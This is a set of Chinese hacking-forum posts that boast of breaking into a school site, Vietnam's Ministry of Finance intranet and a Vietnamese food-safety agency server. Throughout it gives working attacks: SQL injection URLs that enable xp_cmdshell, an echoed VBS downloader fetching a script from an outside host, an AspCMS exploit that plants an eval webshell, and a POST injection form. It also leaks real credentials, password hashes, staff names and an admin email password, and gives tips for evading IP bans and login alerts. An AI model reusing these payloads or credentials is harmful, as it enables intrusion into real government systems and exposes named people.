渗透一个习科基友女神的学校

网站后台存在POST注入 IIS版本是7.0

跑出来的数据库

结果帐号密码不正确 ,也是他这个站的数据库 乱七八糟 看不懂

只能想其他办法了Microsoft SQL Server 的数据库 我们试试他的权限够不够写webshell  或者xp-cmdshell

果断的可以的那是不是 我们可以拿下 网站权限和服务器了呢。 问题又来了 网站根本找不到路径,如果一个一个翻不是到明天早上了吗?有人说先拿服务器权限吧!


表示是内网的IP需要转发,所以我准备先拿webshell在说。本来我也准备一个一个去dir进去找目录的 但是那样不是找到明天早上了吗?

我翻了C E盘在里面发现一个目录E:\syyzWZ\  为了快速确定 是否是网站路径 我去网站上找图片的网站路径


确认路径存在  我们直接 echo写入

成功拿下 然后接下来提服务器就非常容易了 直接pr转发就可以了 我就不进行这步了 毕竟我们都是好孩子,不要做坏事

习科秒杀入越南财政部内网全过程 2015-5-30 11:00:52

习科昨天凌晨3点检修黑板报和附件服务器,把缓存代理关了(81端口其实可以访问的)。。本来估计要24小时左右恢复,不过6个小时左右就恢复了
闲话说的有点多,正文开始。

越南财政部 www.mof.gov.vn  (说好的外交部呢?别问我,我特么的不知道…..)没有。。。

就这样。。。特么的就来财政部了

正在 Ping www.mof.gov.vn [118.70.204.144] 具有 32 字节的数据:

这种都到部委级别的站了,估计整个第4段ip全是它的。用iknock扫一下同C的ip段:

于是先拿临近ip下手,也是财政部的机器,主站是144,看到有个存活的154的机器。

  1. 正在 Ping msns.mof.gov.vn [118.70.204.154] 具有 32 字节的数据:

复制代码

临近ip开放常用端口的机器不多,比较操蛋的是,这个154居然用万能密码上去了,一个不知道什么的后台,但是从aspx中可以判断是台windows,拿来当跳板再好不过了。

  1. http://msns.mof.gov.vn/hagiang/login.aspx
  2. http://msns.mof.gov.vn/hagiang/adminlogin.aspx
  3. 万能密码’or’1’=’1
  4. 后来添加的账号和密码silic1/silic1

复制代码

添加信息看不懂。。。。上传上去下载方式不是物理路径,是变量形式的。
(一开始上去不是最高权限的账户,后来习科的大牛又提权的。。。后台提权。方法未知)

从添加和编辑的页面没有找到突破点(主要看不懂啊),换个思路,点开右上角编辑个人资料页面,发现一个SA的注入点!

具体怎么研究的这个注入点,先来看一个语句

  1. http://msns.mof.gov.vn/hagiang/iframe.aspx?page=account_edit&mode=edit&id=42+union+all+select+1,null,null,4,null,null,7,8,9,null,1,2,null,null,null,6,null,null,9,0,1,2,3;EXEC+sp_configure’show advanced options’,1;RECONFIGURE;EXEC+sp_configure’xp_cmdshell’,1;RECONFIGURE;select+1

复制代码

第一步union出字段以后,发现表太多,支持多语句查询。但是执行exec xp_cmdshell发现报错。
多语句查询,SA权限,直接从注入点解禁xp_cmdshell,执行命令。
然后就开始各种exec_xpcmdshell执行命令。

分别ping和ipconfig了一下,发现ping不通外网,网关限制了。

   Connection-specific DNS Suffix  . :
Link-local IPv6 Address . . . . . : fe80::7:b9c1:37ee:f06b%11
IPv4 Address. . . . . . . . . . . : 10.192.246.45
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.192.246.1

这台机器属于纯内网,通过网关开放80端口出来,从实际效果而言,除了80端口,其他任何端口都出不来外网,跟没联网差不多。

不管怎么样,先写上webshell再说吧,毕竟只开放80端口。
路径猜不到,靠工具跑盲注点太慢了。于是干脆执行echo命令写个读iis配置的vbs文件上去:

  1. echo Set xPost = CreateObject(^”Microsoft.XMLHTTP^”):xPost.Open ^”GET^”,^”http://attach.blackbap.org/down/wzaq/iis.vbs^”,0:xPost.Send():Set sGet = CreateObject(^”ADODB.Stream^”):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^”C:\c:\windows\temp\iis.vbs^”,2 >c:\windows\temp\a.vbs

复制代码

***特殊字符需要前面加个^转义,可以本地自己echo测试

尝试着echo写一个下载文件的vbs脚本到系统。然后发现cscript执行这个echo的vbs不能成功下载(本地测试成功),看来果然是出不去,只好把读取iis配置的vbs也echo上去了(很长很长很长很长)

总之最后是把webshell写上去了

这种除了80端口其他完全弹不出来的情况,上远控主机也无法上线。。还是研究怎么把3389转发出来吧。
reduh上去以后提示失败。。。于是核心群的大神找了一个神工具,原理和reduh一样,但是在此次渗透中,更实用+更稳定

  1. jeary.org/?post=44
  2. D:\proxy\proxy.py -u http://msns.mof.gov.vn/hagiang/conn.aspx -l 1234 -r 3389 -v

复制代码

通过MSSQL的xp_cmdshell添加了用户后成功登陆。

这台机器无法联网,DNS都解析不出来,传工具只能用webshell,每次只能传1MB左右的文件(速度还非常慢。。)
先看一下传上去的工具。。

目前还只用到这些,后期还会传nmap+wincap、Wireshark之类的,简直酸爽的不要不要的
读取了管理员的RDP记录,发现管理员没在服务器上登陆过别的机器的3389或者SSH,用iKnock扫了下内网,其中10.192.0.x这个ip段下只有一台Oracle主机存活,而10.192.246.45所在的ip段有多台主机存活

管理员登陆记录是很久以前的,所以wce并没有读到明文密码,对其他机器自然也有太好的直接下手的办法。

读取网站的web.config配置文件,发现的一些关键信息如下:

  1. <connectionStrings>
  2.         <add name=”CAPMASO” connectionString=”Data Source=localhost;Initial Catalog=DVHCC_CAPMASO;User ID=sa;[email protected]″ providerName=”System.Data.SqlClient” />
  3.         <add name=”DMDC_constr” connectionString=”Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.192.0.23)(PORT=1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=DNS)));User ID=dns;Password=dn$2o12;” />
  4.         <add name=”DNS_constr” connectionString=”Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.192.0.23)(PORT=1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=DNS)));User ID=dns;Password=dn$2o12;” />
  5. </connectionStrings>
  6. <appSettings>
  7.         <add key=”AppTitle” value=”Dịch vụ công trực tuyến” />
  8.         <add key=”SoTaiChinhID” value=”23″ />
  9.         <add key=”DMDC” value=”oracle” />
  10.         <add key=”IDTepTK” value=”41832″ />
  11.         <add key=”IDTepTK_XDCB” value=”42521″ />
  12.         <add key=”ServicesURL” value=”http://10.192.246.45:8888/DNSWS/DNSServiceSoapHttpPort” />
  13.         <add key=”AppURL” value=”http://msns.mof.gov.vn/” />
  14.         <add key=”KichHoatQuaEmail” value=”0″ />
  15.         <add key=”DiaBanID” value=”12″/>
  16.         <add key=”CQTC_MA” value=”1202″/>
  17.         <add key=”KhoBacCapTren” value=”3449″/>
  18. </appSettings>

复制代码

有MSSQL的配置信息,有Oracle的配置信息。

关于MSSQL,库中的表都是越南语或者简写命名,太不好分辨哪些有价值哪些没价值了,所以直接用习科的MSSQL脱库工具,一键全脱,然后以关键字筛选后下载。
至于Oracle,找了很多工具,最后推荐一个精简不需要sqlplus的工具SQL Tools
我们选择的是这个版本:

03.10.2011 SQLTools 1.5 RC1 build 22 (Zip) 1.12M

因为本机没有撞Oracle环境,这是连接串的设置,要在TNS那里选择“Bypass tnsname.ora”,并且勾上U“se Service instead of sid”

先试着用Oracle读文件试试吧

  1. –查看当前的目录环境
  2. SELECT * FROM dba_directories
  3. –设置目录
  4. create or replace directory FILENAME as ‘C:\';
  5. –创建写入内容的表
  6. CREATE TABLE TEST(a VARCHAR2(4000),b VARCHAR2(4000));
  7. –读取文件
  8. DECLARE
  9.   filehandle utl_file.file_type;
  10.   filebuffer varchar(200);
  11.    BEGIN
  12.      filehandle := utl_file.fopen(‘FILENAME’,’boot.ini’,’r’);
  13.     loop
  14.       begin
  15.            utl_file.get_line(filehandle,filebuffer);
  16.            INSERT INTO TEST(a) VALUES(filebuffer);
  17.            EXCEPTION
  18.              WHEN no_data_found THEN
  19.              exit ;
  20.        End;
  21.       END LOOP;
  22.     utl_file.fclose(filehandle);
  23. COMMIT;
  24. END;

复制代码

读取文本提示失败,但是写入文件似乎是成功了。

目前对于这台服务器的思路就是写入启动项一个bat,管理员重启机器的时候添加administrators的用户。。。但是这种时效性太差。
这期间nmap分为25个RAR包依次上传完毕,正好启动nmap扫一下10.192.0.23这台机器的端口

  1. C:\Users\iis_user\Desktop\tools>nmap -p- 10.192.0.23
  2. Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2015-06-06 13:53 SE Asia Standard Time
  3. Nmap scan report for 10.192.0.23
  4. Host is up (0.0019s latency).
  5. Not shown: 999 filtered ports
  6. PORT     STATE SERVICE
  7. 1521/tcp open  oracle
  8. Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds

复制代码

就在下一步一筹莫展的时候,从网络共享中发现了进一步的突破

  1. \\Elearnapp2\e\Elearning\BackUp\Web
  2. <add key=”solrUrl” value=”http://10.192.246.34:8983/solr” />
  3. <add key=”webrootpath” value=”\\10.192.246.33\e\Elearning\Web” />
  4. <add key=”chatdomain” value=”http://dtttmedia.mof.gov.vn/html/hello.html” />
  5. <add key=”learningComponentsConnnectionString” value=”Server=10.192.0.31;Database=elearning_scorm;uid=sa;[email protected];” />
  6. <add key=”pathLiveWebinar” value=”C:\Program Files\Red5\webapps\livewebinar\streams\” />

复制代码

web.config文件中一些关键配置。其中10.192.0.31没有开放1433,但是机器存活。

配置中的dtttmedia.mof.gov.vn/html/hello.html页面存在。

未完待续

Aspcms 批量EXP 改良 可实现软件批量

/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add
POST:GroupID=1&LoginName=111111&Password=111111&AdminDesc=111111&UserStatus=1

/admin_aspcms/_style/AspCms_TemplateEdit.asp?acttype=&action=edit
POST:filename=..%2F..%2Fred.asp&filetext=%3C%25eval%20%28eval%28chr%28114%29%2Bchr%28101%29%2Bchr%28113%29%2Bchr%28117%29%2Bchr%28101%29%2Bchr%28115%29%2Bchr%28116%29%29%28%22hanyu%22%29%29%25%3E…………….test
可以直接getshell

骚年你还在LOL吗 ?赶快放下你游戏 ,拿上键盘和我去拯救世界吧!

 

坛友越南食品安全卫生部奇葩入侵思路

论坛原帖:《越南gov一个站的奇葩,有姿势的来
查了一下,这个是越南的食品卫生安全部的什么什么鬼,简称vfa吧
原帖讨论说:这个地址vfa.gov.vn/dinh-duong/thong-tin-dinh-duong-1236.vfa后面加单引号后便报错了。报错如下图:

楼主没成功,于是习科VIP核心群的几个人在深夜的时候测试了一下,有很大的突破。
但毕竟服务器有防护,在深入的时候,代理的ip地址一个个的全被封了。

于是本篇就是 上,至于下篇,还没有,ip地址多的小伙伴可以给力写一下,毕竟我们的工作做得已经相当足了。

I. 踩点注入
楼主已经说了有waf了,不触防火墙的霉头,下手点从同服务器其他站上面看。
服务器ip地址:14.160.51.50
开了21(FTP),22(SSH),25(SMTP),53(DNS),110(POP#),143(IMAP),443(HTTPS),2222(控制面板),3306(MYSQL)
别轻易尝试爆破,服务器的防护设备直接禁ip、、、
服务器绑定的域名不少,不过能成功解析的不多。
比方说这个diembao.vfa.gov.vn

A PHP Error was encountered

Severity: Warning

Message: include_once(/home/diembao/domains/diembao.vfa.gov.vn/public_html/system/application/config/autoload.php) [function.include-once]: failed to open stream: No such file or directory

Filename: libraries/Loader.php

Line Number: 946

还有的站直接提示“Website đang trong quá trình nâng cấp, đề nghị quý vị truy cập sau”正在建设中。

最后找到这么个站:tiepnhanquangcao.vfa.gov.vn

站点整体比较简洁正规,没什么特别明显的漏洞。在该站的搜索框输入单引号,报错了。

Database Error
Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘%’ And hstra.sohieu <> ”’ at line 1

select hstra.idhosotra,hstra.idhosonhan, hstra.sohieu,hstra.datra,hstra.ngaytra,hsnhan.idhosonhan, hsnhan.tencongty,hs.idhosotra, hs.idproduct,p.idproduct, p.name, p.giayvsattp From product as p, hosotra as hstra, hosonhan as hsnhan,sp_hstra as hs Where p.idproduct = hs.idproduct And hs.idhosotra = hstra.idhosotra And hsnhan.idhosonhan = hstra.idhosonhan AND p.name LIKE ‘%’%’ And hstra.sohieu <> ”

II. 搜索POST注入
这个注入点地址是tiepnhanquangcao.vfa.gov.vn/hoso/timkiem,类型为字符型POST搜索注入。
数了一下报错语句中的SQL字段数是12,从原SQL语句看,union联合查询的时候1到12个字段应该就可以了。

构造如下代码保存为html就可以开始本地POST语句进行SQL执行了。

  1. <form id=”loginForm” action=”http://tiepnhanquangcao.vfa.gov.vn/hoso/timkiem” method=post>
  2. <textarea rows=”5″ cols=”80″ name=”key”>’and 1=2 union select 1,2,3,4,5,6,7,8,9,0,11,12#</textarea><br /><br />
  3. <input type=”submit” name=”” value=”XXXXXX” style=”width:120px;height:64px;”>
  4. </form>

复制代码

文本框中的SQL语句可以自己根据需要进行修改例如

  1. ‘and 1=2 union select 1,2,3,4,5,6,concat(database(),0x3a,user(),0x3a,version()),8,9,0,11,12#

复制代码

查询到 “表名 ### 字段名  –  数据”

  1. user ###iduser,fullname,username,password,email
  2. tranngocduoc:21232f297a57a5a743894a0e4a801fc3        admin
  3. tnduoc:d86a338005637ca1be394bc2f38d9c65                ngocduoc
  4. users ###id,manhom,name,username,password,dienthoai,email,role,ngaysinh
  5. 25:Quantri:admin:toan182
  6. 20:Trương Thúy Ngọc:truongthuyngoc:truongthuyngoc
  7. 20:Nguyễn Hải Hà:nguyenhaiha:truongthuyngoc
  8. 20:Lê Hằng Nga:ngale212:truongthuyngoc
  9. 20:Đinh Quang Minh:minhdq:truongthuyngoc
  10. 20:Nguyễn Thị Minh Hải:minhhai:123456
  11. 20:Trần Thị Nhài:trannhai:truongthuyngoc
  12. 20:Trần Thị Thu Liễu:tranthithulieu

复制代码

查询到quantri(这个单词似乎是越南语管理员的意思)表中有字段 ###idquantri,id_group,username,password,fullname,email,male,birthday,date_reg,date_log,last_active,active,active_code,send_mail
数据仅有一条:

  1. 24    admin        6795c5872ec5e1d75d77b854f85422e0    //toan182

复制代码

但是无论哪个表的数据都无法登陆后台
于是读了一下nhom_users表中的数据,这个表两个字段idnhom,chucvu,前者idnhom是设置用户等级的,与users表中的manhom对应

  1. 18:Văn thư        游客???
  2. 19:Thành viên        会员
  3. 20:Thẩm xét        考试???
  4. 21:Lãnh đạo phòng        房间里的头目??
  5. 22:Lãnh đạo cục        部门的领导
  6. 25:Quản trị hệ thống        系统管理

复制代码

(对不起,我们猴子语比较渣。。)
而与25相对应的管理员显然无法登陆后台。

III. 进一步的突破
进一步的突破点有3。

No 1. 服务器上面有phpMyadmin,我们这之前掌握了大量账号,以及注入得到的信息

  1. admin_tnqc:[email protected]:5.0.67-community

复制代码

admin_tnqc这个账户的密码或许可以撞出来。

当然了,还有前面掌握的PHP报错爆出来的物理路径/home/diembao,
这个diembao的用户应该可以登陆SSH或者FTP中的一个

No 2. 主站有后台,后台登陆的时候有提示,类似于国内提示的用户不存在和密码错误两种。
除了admin以外,还有数据库中的这个用户也能登陆后台:

  1. 20:Trần Thị Nhài:trannhai:truongthuyngoc

复制代码

看数据库中的密码规律,这个用户的密码应该不难猜。

No 3. 也是最操蛋的。直接把管理员邮箱上了,而且是控制面板的邮箱。
看个图就知道了

(别随便下里面的附件,全特么的木马后门病毒)
设置本地email客户端收信地址即服务器地址14.160.51.50,用户名[email protected],密码toan81(要不然就是toan182)
看到关键词了吗?
vfa, diembao,2222,toan81。。。

IV. 最后友情提示
一般思路,不难搞,就是需要注意几点。
服务器的控制面板登陆:diembao.vfa.gov.vn:2222,密码错误10次,就封ip,应该是iptables封,ip被封以后连收信都收不了,网页更打不开,永久封手动解,所以且日且珍惜。
Gmail有异地登陆提示,看好了管理员的ip地址挂好了代理再登人家的Gmail。
这个操蛋的管理员还在服务器上挂了个网购站lenamtien.com 呵呵哒。。。
///Silic.Org